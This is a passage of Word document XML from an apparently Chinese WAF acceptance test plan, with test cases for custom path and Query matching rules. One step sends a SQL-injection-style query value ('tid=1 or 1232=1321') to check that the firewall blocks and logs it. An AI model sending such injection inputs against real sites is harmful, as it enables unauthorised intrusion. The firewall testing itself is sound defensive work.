              <w:t>ttp://www.site.com/wp-login/adminMangage.php;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="08908A3B">
            <w:pPr>
              <w:pStyle w:val="89"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="28"/>
              </w:numPr>
              <w:spacing w:after="163"/>
              <w:ind w:firstLine="420"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>查看W</w:t>
            </w:r>
            <w:r>
              <w:t>AF</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>是否对该流量进行拦截并记录匹配该条自定义规则的流量日志。</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="4E00D80F">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1769" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F1F1F1" w:themeFill="background1" w:themeFillShade="F2"/>
          </w:tcPr>
          <w:p w14:paraId="0CBD1736">
            <w:pPr>
              <w:spacing w:after="163"/>
              <w:ind w:firstLine="0" w:firstLineChars="0"/>
              <w:rPr>
                <w:rFonts w:cs="宋体"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:cs="宋体"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>预期结果</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7443" w:type="dxa"/>
            <w:gridSpan w:val="3"/>
          </w:tcPr>
          <w:p w14:paraId="4D3038D3">
            <w:pPr>
              <w:pStyle w:val="89"/>
              <w:spacing w:after="163"/>
              <w:ind w:firstLine="420"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>W</w:t>
            </w:r>
            <w:r>
              <w:t>AF</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>成功匹配自定义规则，拦截流量并记录日志。</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="0C09628B">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1769" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F1F1F1" w:themeFill="background1" w:themeFillShade="F2"/>
          </w:tcPr>
          <w:p w14:paraId="116D9663">
            <w:pPr>
              <w:spacing w:after="163"/>
              <w:ind w:firstLine="0" w:firstLineChars="0"/>
              <w:rPr>
                <w:rFonts w:cs="宋体"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:cs="宋体"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>判定结果</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7443" w:type="dxa"/>
            <w:gridSpan w:val="3"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="342F0CC3">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6ECDD40">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1769" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F1F1F1" w:themeFill="background1" w:themeFillShade="F2"/>
          </w:tcPr>
          <w:p w14:paraId="5F162FD5">
            <w:pPr>
              <w:spacing w:after="163"/>
              <w:ind w:firstLine="0" w:firstLineChars="0"/>
              <w:rPr>
                <w:rFonts w:cs="宋体"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:cs="宋体"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>测试人员</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2835" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="7135E733">
            <w:pPr>
              <w:pStyle w:val="89"/>
              <w:spacing w:after="163"/>
              <w:ind w:firstLine="420"/>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hAnsi="宋体"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1701" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F1F1F1" w:themeFill="background1" w:themeFillShade="F2"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="3BF39427">
            <w:pPr>
              <w:spacing w:after="163"/>
              <w:ind w:firstLine="420"/>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hAnsi="宋体"/>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体"/>
                <w:b/>
              </w:rPr>
              <w:t>日期</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2907" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="0A8762FB">
            <w:pPr>
              <w:pStyle w:val="89"/>
              <w:spacing w:after="163"/>
              <w:ind w:firstLine="420"/>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hAnsi="宋体"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="47F09E37">
      <w:pPr>
        <w:spacing w:after="163"/>
        <w:ind w:firstLine="0" w:firstLineChars="0"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="74F28622">
      <w:pPr>
        <w:pStyle w:val="3"/>
      </w:pPr>
      <w:bookmarkStart w:id="130" w:name="_Toc21077817"/>
      <w:bookmarkStart w:id="131" w:name="_Toc81916121"/>
      <w:bookmarkStart w:id="132" w:name="_Toc1369897676"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>路径匹配</w:t>
      </w:r>
      <w:bookmarkEnd w:id="130"/>
      <w:bookmarkEnd w:id="131"/>
      <w:bookmarkEnd w:id="13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B656715">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1769" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F1F1F1" w:themeFill="background1" w:themeFillShade="F2"/>
          </w:tcPr>
          <w:p w14:paraId="1710C49C">
            <w:pPr>
              <w:spacing w:after="163"/>
              <w:ind w:firstLine="0" w:firstLineChars="0"/>
              <w:rPr>
                <w:rFonts w:cs="宋体"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:cs="宋体"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>测试项目</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7443" w:type="dxa"/>
            <w:gridSpan w:val="3"/>
          </w:tcPr>
          <w:p w14:paraId="79534AB1">
            <w:pPr>
              <w:pStyle w:val="89"/>
              <w:spacing w:after="163"/>
              <w:ind w:firstLine="420"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>自定义路径匹配规则</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="38761A45">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1769" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F1F1F1" w:themeFill="background1" w:themeFillShade="F2"/>
          </w:tcPr>
          <w:p w14:paraId="4C3050FE">
            <w:pPr>
              <w:spacing w:after="163"/>
              <w:ind w:firstLine="0" w:firstLineChars="0"/>
              <w:rPr>
                <w:rFonts w:cs="宋体"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:cs="宋体"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>测试项目描述</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7443" w:type="dxa"/>
            <w:gridSpan w:val="3"/>
          </w:tcPr>
          <w:p w14:paraId="749FFB3C">
            <w:pPr>
              <w:pStyle w:val="89"/>
              <w:spacing w:after="163"/>
              <w:ind w:firstLine="420"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>添加匹配路径规则来检测流量是否匹配并进行日志记录。</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="214D9FA8">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1769" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F1F1F1" w:themeFill="background1" w:themeFillShade="F2"/>
          </w:tcPr>
          <w:p w14:paraId="25DA8B15">
            <w:pPr>
              <w:spacing w:after="163"/>
              <w:ind w:firstLine="0" w:firstLineChars="0"/>
              <w:rPr>
                <w:rFonts w:cs="宋体"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:cs="宋体"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>执行步骤</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7443" w:type="dxa"/>
            <w:gridSpan w:val="3"/>
          </w:tcPr>
          <w:p w14:paraId="4C165914">
            <w:pPr>
              <w:pStyle w:val="89"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="29"/>
              </w:numPr>
              <w:spacing w:after="163"/>
              <w:ind w:firstLine="420"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>添加防护站点，绑定至后端真实s</w:t>
            </w:r>
            <w:r>
              <w:t>erver</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>；</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="106433CD">
            <w:pPr>
              <w:pStyle w:val="89"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="29"/>
              </w:numPr>
              <w:spacing w:after="163"/>
              <w:ind w:firstLine="420"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>将W</w:t>
            </w:r>
            <w:r>
              <w:t>EB</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>流量牵引至W</w:t>
            </w:r>
            <w:r>
              <w:t>AF</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>检测节点；</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6F2409A6">
            <w:pPr>
              <w:pStyle w:val="89"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="29"/>
              </w:numPr>
              <w:spacing w:after="163"/>
              <w:ind w:firstLine="420"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>在「网站防护」-「自定义规则」-「全局自定义规则」中点击「添加规则」，当用户浏览防护站点解码后路径中包含admin</w:t>
            </w:r>
            <w:r>
              <w:t>Login</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>时进行拦截；</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="54931EC3">
            <w:pPr>
              <w:pStyle w:val="89"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="29"/>
              </w:numPr>
              <w:spacing w:after="163"/>
              <w:ind w:firstLine="420"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>浏览器访问：</w:t>
            </w:r>
            <w:r>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:instrText xml:space="preserve"> HYPERLINK "http://www.site.com/adminLogin.php" </w:instrText>
            </w:r>
            <w:r>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="36"/>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>h</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="36"/>
              </w:rPr>
              <w:t>ttp://www.site.com/adminLogin.php</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="36"/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>；</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2B10099D">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4C2A7825">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1769" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F1F1F1" w:themeFill="background1" w:themeFillShade="F2"/>
          </w:tcPr>
          <w:p w14:paraId="39F2BEC8">
            <w:pPr>
              <w:spacing w:after="163"/>
              <w:ind w:firstLine="0" w:firstLineChars="0"/>
              <w:rPr>
                <w:rFonts w:cs="宋体"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:cs="宋体"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>预期结果</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7443" w:type="dxa"/>
            <w:gridSpan w:val="3"/>
          </w:tcPr>
          <w:p w14:paraId="308DD4D3">
            <w:pPr>
              <w:pStyle w:val="89"/>
              <w:spacing w:after="163"/>
              <w:ind w:firstLine="420"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>W</w:t>
            </w:r>
            <w:r>
              <w:t>AF</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>成功匹配自定义规则，拦截流量并记录日志。</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="48D3EE4D">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1769" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F1F1F1" w:themeFill="background1" w:themeFillShade="F2"/>
          </w:tcPr>
          <w:p w14:paraId="145006F3">
            <w:pPr>
              <w:spacing w:after="163"/>
              <w:ind w:firstLine="0" w:firstLineChars="0"/>
              <w:rPr>
                <w:rFonts w:cs="宋体"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:cs="宋体"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>判定结果</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7443" w:type="dxa"/>
            <w:gridSpan w:val="3"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="5D27542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28F4F65">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1769" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F1F1F1" w:themeFill="background1" w:themeFillShade="F2"/>
          </w:tcPr>
          <w:p w14:paraId="0569D82B">
            <w:pPr>
              <w:spacing w:after="163"/>
              <w:ind w:firstLine="0" w:firstLineChars="0"/>
              <w:rPr>
                <w:rFonts w:cs="宋体"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:cs="宋体"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>测试人员</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2835" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="48969514">
            <w:pPr>
              <w:pStyle w:val="89"/>
              <w:spacing w:after="163"/>
              <w:ind w:firstLine="420"/>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hAnsi="宋体"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1701" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F1F1F1" w:themeFill="background1" w:themeFillShade="F2"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="53E20797">
            <w:pPr>
              <w:spacing w:after="163"/>
              <w:ind w:firstLine="420"/>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hAnsi="宋体"/>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体"/>
                <w:b/>
              </w:rPr>
              <w:t>日期</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2907" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="214A1834">
            <w:pPr>
              <w:pStyle w:val="89"/>
              <w:spacing w:after="163"/>
              <w:ind w:firstLine="420"/>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hAnsi="宋体"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="3EE59AA0">
      <w:pPr>
        <w:spacing w:after="163"/>
        <w:ind w:firstLine="420"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0969CA2A">
      <w:pPr>
        <w:pStyle w:val="3"/>
      </w:pPr>
      <w:bookmarkStart w:id="133" w:name="_Toc81916122"/>
      <w:bookmarkStart w:id="134" w:name="_Toc21077818"/>
      <w:bookmarkStart w:id="135" w:name="_Toc698061045"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Query匹配</w:t>
      </w:r>
      <w:bookmarkEnd w:id="133"/>
      <w:bookmarkEnd w:id="134"/>
      <w:bookmarkEnd w:id="135"/>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F2D9CC8">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1769" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F1F1F1" w:themeFill="background1" w:themeFillShade="F2"/>
          </w:tcPr>
          <w:p w14:paraId="3A7D5F29">
            <w:pPr>
              <w:spacing w:after="163"/>
              <w:ind w:firstLine="0" w:firstLineChars="0"/>
              <w:rPr>
                <w:rFonts w:cs="宋体"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:cs="宋体"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>测试项目</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7443" w:type="dxa"/>
            <w:gridSpan w:val="3"/>
          </w:tcPr>
          <w:p w14:paraId="76B880AE">
            <w:pPr>
              <w:pStyle w:val="89"/>
              <w:spacing w:after="163"/>
              <w:ind w:firstLine="420"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>自定义Query匹配规则</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="21DD1605">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1769" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F1F1F1" w:themeFill="background1" w:themeFillShade="F2"/>
          </w:tcPr>
          <w:p w14:paraId="33E46B04">
            <w:pPr>
              <w:spacing w:after="163"/>
              <w:ind w:firstLine="0" w:firstLineChars="0"/>
              <w:rPr>
                <w:rFonts w:cs="宋体"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:cs="宋体"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>测试项目描述</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7443" w:type="dxa"/>
            <w:gridSpan w:val="3"/>
          </w:tcPr>
          <w:p w14:paraId="5CEA416F">
            <w:pPr>
              <w:pStyle w:val="89"/>
              <w:spacing w:after="163"/>
              <w:ind w:firstLine="420"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>添加匹配Query规则来检测流量是否匹配并进行日志记录。</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="5A44D528">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1769" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F1F1F1" w:themeFill="background1" w:themeFillShade="F2"/>
          </w:tcPr>
          <w:p w14:paraId="39A2775D">
            <w:pPr>
              <w:spacing w:after="163"/>
              <w:ind w:firstLine="0" w:firstLineChars="0"/>
              <w:rPr>
                <w:rFonts w:cs="宋体"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:cs="宋体"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>执行步骤</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7443" w:type="dxa"/>
            <w:gridSpan w:val="3"/>
          </w:tcPr>
          <w:p w14:paraId="28C9F172">
            <w:pPr>
              <w:pStyle w:val="89"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="30"/>
              </w:numPr>
              <w:spacing w:after="163"/>
              <w:ind w:firstLine="420"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>添加防护站点，绑定至后端真实s</w:t>
            </w:r>
            <w:r>
              <w:t>erver</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>；</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="664060E7">
            <w:pPr>
              <w:pStyle w:val="89"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="30"/>
              </w:numPr>
              <w:spacing w:after="163"/>
              <w:ind w:firstLine="420"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>将W</w:t>
            </w:r>
            <w:r>
              <w:t>EB</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>流量牵引至W</w:t>
            </w:r>
            <w:r>
              <w:t>AF</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>检测节点；</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4ED26A7D">
            <w:pPr>
              <w:pStyle w:val="89"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="30"/>
              </w:numPr>
              <w:spacing w:after="163"/>
              <w:ind w:firstLine="420"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>在「网站防护」-「自定义规则」-「全局自定义规则」中点击「添加规则」，当用户浏览防护站点的Query参数中包含or</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> 1232=1321</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>时进行拦截；</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="794C1ED0">
            <w:pPr>
              <w:pStyle w:val="89"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="30"/>
              </w:numPr>
              <w:spacing w:after="163"/>
              <w:ind w:firstLine="420"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>浏览器访问：h</w:t>
            </w:r>
            <w:r>
              <w:t>ttp://www.site.com/search?tid=1 or 1232=1321</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>；</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="784716DB">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194B9AE7">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1769" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F1F1F1" w:themeFill="background1" w:themeFillShade="F2"/>
          </w:tcPr>
          <w:p w14:paraId="1DB23447">
            <w:pPr>
              <w:spacing w:after="163"/>
              <w:ind w:firstLine="0" w:firstLineChars="0"/>
              <w:rPr>
                <w:rFonts w:cs="宋体"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:cs="宋体"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>预期结果</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7443" w:type="dxa"/>
            <w:gridSpan w:val="3"/>
          </w:tcPr>
          <w:p w14:paraId="588C4BFA">
            <w:pPr>
              <w:pStyle w:val="89"/>
              <w:spacing w:after="163"/>
              <w:ind w:firstLine="420"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>W</w:t>
            </w:r>
            <w:r>
              <w:t>AF</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>成功匹配自定义规则，拦截流量并记录日志。</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="1FE51051">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1769" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F1F1F1" w:themeFill="background1" w:themeFillShade="F2"/>
          </w:tcPr>
          <w:p w14:paraId="048244AC">
            <w:pPr>
              <w:spacing w:after="163"/>
              <w:ind w:firstLine="0" w:firstLineChars="0"/>
              <w:rPr>
                <w:rFonts w:cs="宋体"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:cs="宋体"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>判定结果</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7443" w:type="dxa"/>
            <w:gridSpan w:val="3"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="1491292B">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6F65B62">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1769" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F1F1F1" w:themeFill="background1" w:themeFillShade="F2"/>
          </w:tcPr>
          <w:p w14:paraId="31AFC805">
            <w:pPr>
              <w:spacing w:after="163"/>
              <w:ind w:firstLine="0" w:firstLineChars="0"/>
              <w:rPr>
                <w:rFonts w:cs="宋体"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:cs="宋体"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>测试人员</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2835" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="3F99446E">
            <w:pPr>
              <w:pStyle w:val="89"/>
              <w:spacing w:after="163"/>
              <w:ind w:firstLine="420"/>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hAnsi="宋体"/>
              </w:rPr>
